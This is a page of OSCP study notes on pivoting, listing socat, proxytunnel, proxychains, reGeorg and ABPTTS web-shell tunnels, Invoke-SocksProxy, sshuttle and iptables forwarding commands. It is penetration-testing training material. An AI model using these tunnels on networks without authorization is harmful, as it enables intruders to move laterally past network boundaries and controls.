OSCP
  • All About OSCP
  • OSCP- One Page Repository
  • About the Author
  • Basic Linux & Windows Commands
    • Linux Commands
    • Windows
      • cmd
      • Powershell
      • Basics of windows
    • Linux / WindowsMain commands
    • Bash Scripting
  • Recon (Scanning & Enumeration)
    • Active Info Gathering
      • My Network Recon Checklist
      • My Web Recon Checklist
      • Network Enumeration
      • Port Scanning
    • Common Ports and Services
      • Other Services Enumeration
    • DNS Zone Transfer Attack
    • SNMP Enumeration
    • SMB Enumeration
    • Web Application Directory bruteforcing / fingerprinting
    • Port & Services Scanning
  • Web Application
    • My checklist
      • LFI
      • RFI
      • SQLI
    • File Upload bypass
    • Enumeration and Exploitation
    • No-Sql Injection
    • SQL Injection
    • Hidden Files and directories
    • RFI
    • LFI
  • Brute Force
    • Reuse the hash
    • Password Crack
  • Shells
    • Linux Reverse Shell [One liner]
    • Reverse Shell to fully interactive
    • Reverse Shell Cheat Sheet
    • WebShell
  • Transferring files
    • My Checklist
    • Transfer files on linux
  • Priv Escalation
    • Linux Priv Escalation
      • g0tmi1k linux privilege escalation
      • Privilege Escalation - Linux
      • Checklist - Linux Privilege Escalation
    • Windows Priv Escalation
      • Fuzzysecurity window priv escalation
      • Privilege Escalation - Windows
      • Checklist - Local Windows Privilege Escalation
  • Post Exploitation
    • Cover your tracks
    • Persistence
    • Loot Linux
    • Loot Windows
    • Escaping Restricted Shell
    • Meterpreter shell for post-exploitation
    • Spawn Shell
  • Pivoting
    • My Checklist for Pivoting
    • Tunneling and Port Forwarding
    • Pivotind understanding
  • Buffer Overflow
    • Buffer overflow
    • Buffer overflow Step by Step
      • Study about buffer overflow
      • Brainpan
      • VulnServer
      • Minishare
  • Main Tools
  • MISC
    • Exploit Compiling
  • CheatSheet (Short)
  • OSCP/ Vulnhub Practice learning
    • Machines Practice
    • My Practice on HTB Windows boxes
    • My Practice on Vulnhub boxes
    • Over the Wire (Natas)
    • Over The wire (Bandit)
Powered by GitBook
On this page

Was this helpful?

  1. Pivoting

Tunneling and Port Forwarding

PreviousMy Checklist for PivotingNextPivotind understanding

Last updated 4 years ago

Was this helpful?

SSH over HTTP (Squid)

https://pentest.blog/explore-hidden-networks-with-double-pivoting/

socat

socat TCP-L:9999,fork,reuseaddr PROXY:ip:127.0.0.1:22,proxyport=3128

ssh user@127.0.0.1 -p 9999

proxytunnel

proxytunnel -p ip:3128 -d 127.0.0.1:22 -a 5555

ssh user@127.0.0.1 -p 5555

proxychains

http ip 3128

proxychains ssh user@127.0.0.1

corkscrew

ssh user@ip -t /bin/sh

TCP over HTTP

For this technique, it is necessary to be able to upload a file to a webserver.

1. reGeorgFile upload to the server correct

Tunnel creationpython reGeorgSocksProxy.py -p 5555 -u "http://<ip>/admin/uploads/reGeorg.jsp"

Proxychains config

proxychains nmap -F -sT 127.0.0.1

proxychains mysql -u root -p -h 127.0.0.1

proxychains ssh localhost

Reference: https://sensepost.com/discover/tools/reGeorg/

2. ABBTTS Upload File

Config proxychains and create the tunnelpython abpttsclient.py -c tomcat_walkthrough/config.txt -u http://ip/abptts.jsp -f 127.0.0.1:22222/127.0.0.1:22Usagessh -p 22222 user@127.0.0.1

Reference: https://github.com/nccgroup/ABPTTS

HTTP Redirectors

Windows Socks Proxy

In this case this is going to be used to access Burp listening on a Windows NATed VM from other PCs in the same network as the Windows Host.

From the Windows Host machine (IP: 192.168.1.206)

Import-Module .\Invoke-SocksProxy.psm1
Invoke-SocksProxy -bindPort 1234

From other PC on the Windows Host machine network (IP: 192.168.1.69)

Configure proxychains.conf:

 socks4 	ip 1234 
proxychains socat TCP-LISTEN:8081,fork,reuseaddr TCP:ip:8080

This command ahead makes Burp (which is listening on the NATed machine) accessible from ip on port 8081

Now, configure the Proxy in the browser:

All the traffic is logged on the NATed machine Burp.

Reference: https://github.com/p3nt4/Invoke-SocksProxy

Man's Poor VPN

Traffic forward over SSH without needing to ssh -D <port>

sshuttle -vr user@ip 1X0.1X.0.0/16

1. socatsocat TCP4-LISTEN:80,fork TCP4:REMOTE-HOST-IP-ADDRESS:80

2. iptablesiptables -I INPUT -p tcp -m tcp --dport 80 -j ACCEPTiptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination REMOTEADDR:80iptables -t nat -A POSTROUTING -j MASQUERADEiptables -I FORWARD -j ACCEPTiptables -P FORWARD ACCEPTsysctl net.ipv4.ip_forward=1

LogoGitHub - adon90/pentest_compilation: Compilation of commands, tips and scripts that helped me throughout Vulnhub, Hackthebox, OSCP and real scenariosGitHub
LogoPWK Notes: Tunneling and Pivoting [Updated]0xdf hacks stuff
regeorge2
regeorge1
regeorge3
abbtts7
abbtts5
socatt
iptables
sshuttle
proxyconf
invokesocks